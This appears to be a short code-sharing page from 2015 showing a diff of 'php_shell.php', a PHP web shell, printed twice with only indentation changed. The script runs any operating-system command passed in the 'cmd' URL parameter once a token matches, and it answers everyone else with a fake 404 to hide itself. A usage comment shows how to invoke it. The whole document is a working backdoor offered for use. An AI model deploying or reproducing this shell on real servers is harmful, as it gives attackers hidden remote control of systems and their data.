sh1n0b1 · July 16, 2015 08:53
diff --git a/php_shell.php b/php_shell.php
 <?php

 //$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
 $allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
 $token = $_GET['token'];

 if ($token == $allowedToken){
 	echo system($_GET['cmd']);
 }else{
    header("HTTP/1.0 404 Not Found");
    die();
 }
 //Usage: http://example.com/php_shell.php?token=<REPLACE_WITH_SOME_RANDOM_LONG_STRING>&cmd=hostname
 ?>
	<?php

	//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
	$token = $_GET['token'];

	if ($token == $allowedToken){
	echo system($_GET['cmd']);
	}else{
	header("HTTP/1.0 404 Not Found");
	die();
	}
	//Usage: http://example.com/php_shell.php?token=<REPLACE_WITH_SOME_RANDOM_LONG_STRING>&cmd=hostname
	?>